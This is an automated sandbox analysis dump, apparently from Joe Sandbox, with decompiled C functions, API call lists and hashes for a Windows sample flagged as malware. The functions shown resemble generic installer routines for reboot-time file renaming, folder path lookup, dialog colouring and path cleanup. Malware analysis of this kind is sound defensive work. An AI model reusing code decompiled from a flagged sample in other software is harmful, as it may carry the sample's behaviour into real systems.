                                                                                        							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                                                        								L18:
                                                                                        								return CloseHandle(_t48);
                                                                                        							} else {
                                                                                        								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                        									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                                                        									if(_t49 == 0) {
                                                                                        										_t48 =  *(_t53 + 0x18);
                                                                                        										L16:
                                                                                        										_t24 = _t42;
                                                                                        										L17:
                                                                                        										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                                                        										SetFilePointer(_t48, 0, 0, 0);
                                                                                        										E004060DF(_t48, _t46, _t42 + _t37);
                                                                                        										GlobalFree(_t46);
                                                                                        										goto L18;
                                                                                        									}
                                                                                        									_t39 = _t46 + _t42;
                                                                                        									_t31 = _t39 + _t37;
                                                                                        									while(_t39 > _t49) {
                                                                                        										 *_t31 =  *_t39;
                                                                                        										_t31 = _t31 - 1;
                                                                                        										_t39 = _t39 - 1;
                                                                                        									}
                                                                                        									_t24 = _t49 - _t46 + 1;
                                                                                        									_t48 =  *(_t53 + 0x18);
                                                                                        									goto L17;
                                                                                        								}
                                                                                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                        								_t42 = _t42 + 0xa;
                                                                                        								goto L16;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					CloseHandle(E0040602D(_t44, 0, 1));
                                                                                        					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                        						goto L3;
                                                                                        					}
                                                                                        				}
                                                                                        				return _t12;
                                                                                        			}



















                                                                                        0x00406183
                                                                                        0x0040618c
                                                                                        0x00406193
                                                                                        0x0040619d
                                                                                        0x004061b1
                                                                                        0x004061d9
                                                                                        0x004061e4
                                                                                        0x004061e8
                                                                                        0x00406208
                                                                                        0x0040620f
                                                                                        0x00406219
                                                                                        0x00406226
                                                                                        0x0040622b
                                                                                        0x00406230
                                                                                        0x00406234
                                                                                        0x00406243
                                                                                        0x00406245
                                                                                        0x00406252
                                                                                        0x00406256
                                                                                        0x004062f1
                                                                                        0x00000000
                                                                                        0x0040626c
                                                                                        0x00406279
                                                                                        0x0040629d
                                                                                        0x004062a1
                                                                                        0x004062c0
                                                                                        0x004062c4
                                                                                        0x004062c4
                                                                                        0x004062c6
                                                                                        0x004062cf
                                                                                        0x004062da
                                                                                        0x004062e5
                                                                                        0x004062eb
                                                                                        0x00000000
                                                                                        0x004062eb
                                                                                        0x004062a3
                                                                                        0x004062a6
                                                                                        0x004062b1
                                                                                        0x004062ad
                                                                                        0x004062af
                                                                                        0x004062b0
                                                                                        0x004062b0
                                                                                        0x004062b8
                                                                                        0x004062ba
                                                                                        0x00000000
                                                                                        0x004062ba
                                                                                        0x00406284
                                                                                        0x0040628a
                                                                                        0x00000000
                                                                                        0x0040628a
                                                                                        0x00406256
                                                                                        0x00406234
                                                                                        0x004061b3
                                                                                        0x004061be
                                                                                        0x004061c7
                                                                                        0x004061cb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004061cb
                                                                                        0x004062fc

                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                          • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                          • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                        • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                        • wsprintfA.USER32 ref: 00406202
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                          • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                          • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                        • String ID: %ls=%ls$[Rename]
                                                                                        • API String ID: 2171350718-461813615
                                                                                        • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                        • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                        • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                        • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 72%
                                                                                        			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                        				struct _ITEMIDLIST* _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _t44;
                                                                                        				WCHAR* _t45;
                                                                                        				signed char _t47;
                                                                                        				signed int _t48;
                                                                                        				short _t59;
                                                                                        				short _t61;
                                                                                        				short _t63;
                                                                                        				void* _t71;
                                                                                        				signed int _t77;
                                                                                        				signed int _t78;
                                                                                        				short _t81;
                                                                                        				short _t82;
                                                                                        				signed char _t84;
                                                                                        				signed int _t85;
                                                                                        				intOrPtr _t93;
                                                                                        				void* _t98;
                                                                                        				void* _t104;
                                                                                        				intOrPtr* _t105;
                                                                                        				void* _t107;
                                                                                        				WCHAR* _t108;
                                                                                        				void* _t110;
                                                                                        
                                                                                        				_t107 = __esi;
                                                                                        				_t104 = __edi;
                                                                                        				_t71 = __ebx;
                                                                                        				_t44 = _a8;
                                                                                        				if(_t44 < 0) {
                                                                                        					_t93 =  *0x433edc; // 0x51f5e2
                                                                                        					_t44 =  *(_t93 - 4 + _t44 * 4);
                                                                                        				}
                                                                                        				_push(_t71);
                                                                                        				_push(_t107);
                                                                                        				_push(_t104);
                                                                                        				_t105 =  *0x434f38 + _t44 * 2;
                                                                                        				_t45 = 0x432ea0;
                                                                                        				_t108 = 0x432ea0;
                                                                                        				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                                                        					_t108 = _a4;
                                                                                        					_a4 = _a4 & 0x00000000;
                                                                                        				}
                                                                                        				_t81 =  *_t105;
                                                                                        				_a8 = _t81;
                                                                                        				if(_t81 == 0) {
                                                                                        					L43:
                                                                                        					 *_t108 =  *_t108 & 0x00000000;
                                                                                        					if(_a4 == 0) {
                                                                                        						return _t45;
                                                                                        					}
                                                                                        					return E0040653D(_a4, _t45);
                                                                                        				} else {
                                                                                        					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                        						_t98 = 2;
                                                                                        						_t105 = _t105 + _t98;
                                                                                        						if(_t81 >= 4) {
                                                                                        							if(__eflags != 0) {
                                                                                        								 *_t108 = _t81;
                                                                                        								_t108 = _t108 + _t98;
                                                                                        								__eflags = _t108;
                                                                                        							} else {
                                                                                        								 *_t108 =  *_t105;
                                                                                        								_t108 = _t108 + _t98;
                                                                                        								_t105 = _t105 + _t98;
                                                                                        							}
                                                                                        							L42:
                                                                                        							_t82 =  *_t105;
                                                                                        							_a8 = _t82;
                                                                                        							if(_t82 != 0) {
                                                                                        								_t81 = _a8;
                                                                                        								continue;
                                                                                        							}
                                                                                        							goto L43;
                                                                                        						}
                                                                                        						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                        						_t47 =  *_t105;
                                                                                        						_t48 = _t47 & 0x000000ff;
                                                                                        						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                        						_t85 = _t84 & 0x000000ff;
                                                                                        						_v28 = _t48 | 0x00008000;
                                                                                        						_t77 = 2;
                                                                                        						_v16 = _t85;
                                                                                        						_t105 = _t105 + _t77;
                                                                                        						_v24 = _t48;
                                                                                        						_v20 = _t85 | 0x00008000;
                                                                                        						if(_a8 != _t77) {
                                                                                        							__eflags = _a8 - 3;
                                                                                        							if(_a8 != 3) {
                                                                                        								__eflags = _a8 - 1;
                                                                                        								if(__eflags == 0) {
                                                                                        									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                                        									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                                        								}
                                                                                        								L38:
                                                                                        								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                                        								_t45 = 0x432ea0;
                                                                                        								goto L42;
                                                                                        							}
                                                                                        							_t78 = _v12;
                                                                                        							__eflags = _t78 - 0x1d;
                                                                                        							if(_t78 != 0x1d) {
                                                                                        								__eflags = (_t78 << 0xb) + 0x436000;
                                                                                        								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                                                        							} else {
                                                                                        								E00406484(_t108,  *0x434f08);
                                                                                        							}
                                                                                        							__eflags = _t78 + 0xffffffeb - 7;
                                                                                        							if(__eflags < 0) {
                                                                                        								L29:
                                                                                        								E004067C4(_t108);
                                                                                        							}
                                                                                        							goto L38;
                                                                                        						}
                                                                                        						if( *0x434f84 != 0) {
                                                                                        							_t77 = 4;
                                                                                        						}
                                                                                        						_t121 = _t48;
                                                                                        						if(_t48 >= 0) {
                                                                                        							__eflags = _t48 - 0x25;
                                                                                        							if(_t48 != 0x25) {
                                                                                        								__eflags = _t48 - 0x24;
                                                                                        								if(_t48 == 0x24) {
                                                                                        									GetWindowsDirectoryW(_t108, 0x400);
                                                                                        									_t77 = 0;
                                                                                        								}
                                                                                        								while(1) {
                                                                                        									__eflags = _t77;
                                                                                        									if(_t77 == 0) {
                                                                                        										goto L26;
                                                                                        									}
                                                                                        									_t59 =  *0x434f04;
                                                                                        									_t77 = _t77 - 1;
                                                                                        									__eflags = _t59;
                                                                                        									if(_t59 == 0) {
                                                                                        										L22:
                                                                                        										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                                        										__eflags = _t61;
                                                                                        										if(_t61 != 0) {
                                                                                        											L24:
                                                                                        											 *_t108 =  *_t108 & 0x00000000;
                                                                                        											__eflags =  *_t108;
                                                                                        											continue;
                                                                                        										}
                                                                                        										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                                        										_a8 = _t61;
                                                                                        										__imp__CoTaskMemFree(_v8);
                                                                                        										__eflags = _a8;
                                                                                        										if(_a8 != 0) {
                                                                                        											goto L26;
                                                                                        										}
                                                                                        										goto L24;
                                                                                        									}
                                                                                        									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                                                        									__eflags = _t63;
                                                                                        									if(_t63 == 0) {
                                                                                        										goto L26;
                                                                                        									}
                                                                                        									goto L22;
                                                                                        								}
                                                                                        								goto L26;
                                                                                        							}
                                                                                        							GetSystemDirectoryW(_t108, 0x400);
                                                                                        							goto L26;
                                                                                        						} else {
                                                                                        							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                                                        							if( *_t108 != 0) {
                                                                                        								L27:
                                                                                        								if(_v16 == 0x1a) {
                                                                                        									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                        								}
                                                                                        								goto L29;
                                                                                        							}
                                                                                        							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                                                        							L26:
                                                                                        							if( *_t108 == 0) {
                                                                                        								goto L29;
                                                                                        							}
                                                                                        							goto L27;
                                                                                        						}
                                                                                        					}
                                                                                        					goto L43;
                                                                                        				}
                                                                                        			}






























                                                                                        0x0040657a
                                                                                        0x0040657a
                                                                                        0x0040657a
                                                                                        0x00406580
                                                                                        0x00406585
                                                                                        0x00406587
                                                                                        0x00406596
                                                                                        0x00406596
                                                                                        0x0040659e
                                                                                        0x0040659f
                                                                                        0x004065a0
                                                                                        0x004065a1
                                                                                        0x004065a4
                                                                                        0x004065ac
                                                                                        0x004065ae
                                                                                        0x004065bf
                                                                                        0x004065c2
                                                                                        0x004065c2
                                                                                        0x004065c6
                                                                                        0x004065cc
                                                                                        0x004065cf
                                                                                        0x004067aa
                                                                                        0x004067aa
                                                                                        0x004067b5
                                                                                        0x004067c1
                                                                                        0x004067c1
                                                                                        0x00000000
                                                                                        0x004065d5
                                                                                        0x004065da
                                                                                        0x004065ef
                                                                                        0x004065f0
                                                                                        0x004065f6
                                                                                        0x00406788
                                                                                        0x00406796
                                                                                        0x00406799
                                                                                        0x00406799
                                                                                        0x0040678a
                                                                                        0x0040678d
                                                                                        0x00406790
                                                                                        0x00406792
                                                                                        0x00406792
                                                                                        0x0040679b
                                                                                        0x0040679b
                                                                                        0x004067a1
                                                                                        0x004067a4
                                                                                        0x004065d7
                                                                                        0x00000000
                                                                                        0x004065d7
                                                                                        0x00000000
                                                                                        0x004067a4
                                                                                        0x004065fc
                                                                                        0x004065ff
                                                                                        0x0040660e
                                                                                        0x00406615
                                                                                        0x00406621
                                                                                        0x00406624
                                                                                        0x00406627
                                                                                        0x00406628
                                                                                        0x0040662d
                                                                                        0x00406633
                                                                                        0x00406636
                                                                                        0x00406639
                                                                                        0x0040672c
                                                                                        0x00406731
                                                                                        0x00406764
                                                                                        0x00406769
                                                                                        0x0040676e
                                                                                        0x00406773
                                                                                        0x00406773
                                                                                        0x00406778
                                                                                        0x0040677e
                                                                                        0x00406781
                                                                                        0x00000000
                                                                                        0x00406781
                                                                                        0x00406733
                                                                                        0x00406736
                                                                                        0x00406739
                                                                                        0x0040674e
                                                                                        0x00406755
                                                                                        0x0040673b
                                                                                        0x00406742
                                                                                        0x00406742
                                                                                        0x0040675d
                                                                                        0x00406760
                                                                                        0x00406724
                                                                                        0x00406725
                                                                                        0x00406725
                                                                                        0x00000000
                                                                                        0x00406760
                                                                                        0x00406646
                                                                                        0x0040664a
                                                                                        0x0040664a
                                                                                        0x0040664b
                                                                                        0x0040664d
                                                                                        0x0040668a
                                                                                        0x0040668d
                                                                                        0x0040669d
                                                                                        0x004066a0
                                                                                        0x004066a8
                                                                                        0x004066ae
                                                                                        0x004066ae
                                                                                        0x00406709
                                                                                        0x00406709
                                                                                        0x0040670b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004066b2
                                                                                        0x004066b7
                                                                                        0x004066b8
                                                                                        0x004066ba
                                                                                        0x004066d1
                                                                                        0x004066df
                                                                                        0x004066e5
                                                                                        0x004066e7
                                                                                        0x00406705
                                                                                        0x00406705
                                                                                        0x00406705
                                                                                        0x00000000
                                                                                        0x00406705
                                                                                        0x004066ed
                                                                                        0x004066f6
                                                                                        0x004066f9
                                                                                        0x004066ff
                                                                                        0x00406703
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406703
                                                                                        0x004066cb
                                                                                        0x004066cd
                                                                                        0x004066cf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004066cf
                                                                                        0x00000000
                                                                                        0x00406709
                                                                                        0x00406695
                                                                                        0x00000000
                                                                                        0x0040664f
                                                                                        0x0040666d
                                                                                        0x00406676
                                                                                        0x00406713
                                                                                        0x00406717
                                                                                        0x0040671f
                                                                                        0x0040671f
                                                                                        0x00000000
                                                                                        0x00406717
                                                                                        0x00406680
                                                                                        0x0040670d
                                                                                        0x00406711
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406711
                                                                                        0x0040664d
                                                                                        0x00000000
                                                                                        0x004065da

                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000,00000000,00425A20,774723A0), ref: 004066A8
                                                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll,00000000), ref: 00406779
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsiF917.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 4260037668-3511938506
                                                                                        • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                        • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                        • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                        • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                        				struct tagLOGBRUSH _v16;
                                                                                        				long _t39;
                                                                                        				long _t41;
                                                                                        				void* _t44;
                                                                                        				signed char _t50;
                                                                                        				long* _t54;
                                                                                        
                                                                                        				if(_a4 + 0xfffffecd > 5) {
                                                                                        					L18:
                                                                                        					return 0;
                                                                                        				}
                                                                                        				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                        					goto L18;
                                                                                        				} else {
                                                                                        					_t50 = _t54[5];
                                                                                        					if((_t50 & 0xffffffe0) != 0) {
                                                                                        						goto L18;
                                                                                        					}
                                                                                        					_t39 =  *_t54;
                                                                                        					if((_t50 & 0x00000002) != 0) {
                                                                                        						_t39 = GetSysColor(_t39);
                                                                                        					}
                                                                                        					if((_t54[5] & 0x00000001) != 0) {
                                                                                        						SetTextColor(_a8, _t39);
                                                                                        					}
                                                                                        					SetBkMode(_a8, _t54[4]);
                                                                                        					_t41 = _t54[1];
                                                                                        					_v16.lbColor = _t41;
                                                                                        					if((_t54[5] & 0x00000008) != 0) {
                                                                                        						_t41 = GetSysColor(_t41);
                                                                                        						_v16.lbColor = _t41;
                                                                                        					}
                                                                                        					if((_t54[5] & 0x00000004) != 0) {
                                                                                        						SetBkColor(_a8, _t41);
                                                                                        					}
                                                                                        					if((_t54[5] & 0x00000010) != 0) {
                                                                                        						_v16.lbStyle = _t54[2];
                                                                                        						_t44 = _t54[3];
                                                                                        						if(_t44 != 0) {
                                                                                        							DeleteObject(_t44);
                                                                                        						}
                                                                                        						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                        					}
                                                                                        					return _t54[3];
                                                                                        				}
                                                                                        			}









                                                                                        0x00404512
                                                                                        0x004045c8
                                                                                        0x00000000
                                                                                        0x004045c8
                                                                                        0x00404523
                                                                                        0x00404527
                                                                                        0x00000000
                                                                                        0x00404541
                                                                                        0x00404541
                                                                                        0x0040454a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040454c
                                                                                        0x00404558
                                                                                        0x0040455b
                                                                                        0x0040455b
                                                                                        0x00404561
                                                                                        0x00404567
                                                                                        0x00404567
                                                                                        0x00404573
                                                                                        0x00404579
                                                                                        0x00404580
                                                                                        0x00404583
                                                                                        0x00404586
                                                                                        0x00404588
                                                                                        0x00404588
                                                                                        0x00404590
                                                                                        0x00404596
                                                                                        0x00404596
                                                                                        0x004045a0
                                                                                        0x004045a5
                                                                                        0x004045a8
                                                                                        0x004045ad
                                                                                        0x004045b0
                                                                                        0x004045b0
                                                                                        0x004045c0
                                                                                        0x004045c0
                                                                                        0x00000000
                                                                                        0x004045c3

                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                        • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                        • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                        • GetSysColor.USER32(?), ref: 00404586
                                                                                        • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                        • DeleteObject.GDI32(?), ref: 004045B0
                                                                                        • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                        • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                        • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 91%
                                                                                        			E004067C4(WCHAR* _a4) {
                                                                                        				short _t5;
                                                                                        				short _t7;
                                                                                        				WCHAR* _t19;
                                                                                        				WCHAR* _t20;
                                                                                        				WCHAR* _t21;
                                                                                        
                                                                                        				_t20 = _a4;
                                                                                        				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                        					_t20 =  &(_t20[4]);
                                                                                        				}
                                                                                        				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                                                        					_t20 =  &(_t20[2]);
                                                                                        				}
                                                                                        				_t5 =  *_t20;
                                                                                        				_t21 = _t20;
                                                                                        				_t19 = _t20;
                                                                                        				if(_t5 != 0) {
                                                                                        					do {
                                                                                        						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                                                        							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                        							_t19 = CharNextW(_t19);
                                                                                        						}
                                                                                        						_t20 = CharNextW(_t20);
                                                                                        						_t5 =  *_t20;
                                                                                        					} while (_t5 != 0);
                                                                                        				}
                                                                                        				 *_t19 =  *_t19 & 0x00000000;
                                                                                        				while(1) {
                                                                                        					_push(_t19);
                                                                                        					_push(_t21);
                                                                                        					_t19 = CharPrevW();
                                                                                        					_t7 =  *_t19;
                                                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                        						break;
                                                                                        					}
                                                                                        					 *_t19 =  *_t19 & 0x00000000;
                                                                                        					if(_t21 < _t19) {
                                                                                        						continue;
                                                                                        					}
                                                                                        					break;
                                                                                        				}
                                                                                        				return _t7;
                                                                                        			}








                                                                                        0x004067c6
                                                                                        0x004067cf
                                                                                        0x004067e6
                                                                                        0x004067e6
                                                                                        0x004067ed
                                                                                        0x004067f9
                                                                                        0x004067f9
                                                                                        0x004067fc
                                                                                        0x004067ff
                                                                                        0x00406804
                                                                                        0x00406806
                                                                                        0x0040680f
                                                                                        0x00406813
                                                                                        0x00406830
                                                                                        0x00406838
                                                                                        0x00406838
                                                                                        0x0040683d
                                                                                        0x0040683f
                                                                                        0x00406842
                                                                                        0x00406847
                                                                                        0x00406848
                                                                                        0x0040684c
                                                                                        0x0040684c
                                                                                        0x0040684d
                                                                                        0x00406854
                                                                                        0x00406856
                                                                                        0x0040685d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406865
                                                                                        0x0040686b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040686b
                                                                                        0x00406870

                                                                                        APIs
                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77473420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                        • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                        • CharNextW.USER32(?,00000000,77473420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                        • CharPrevW.USER32(?,?,77473420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
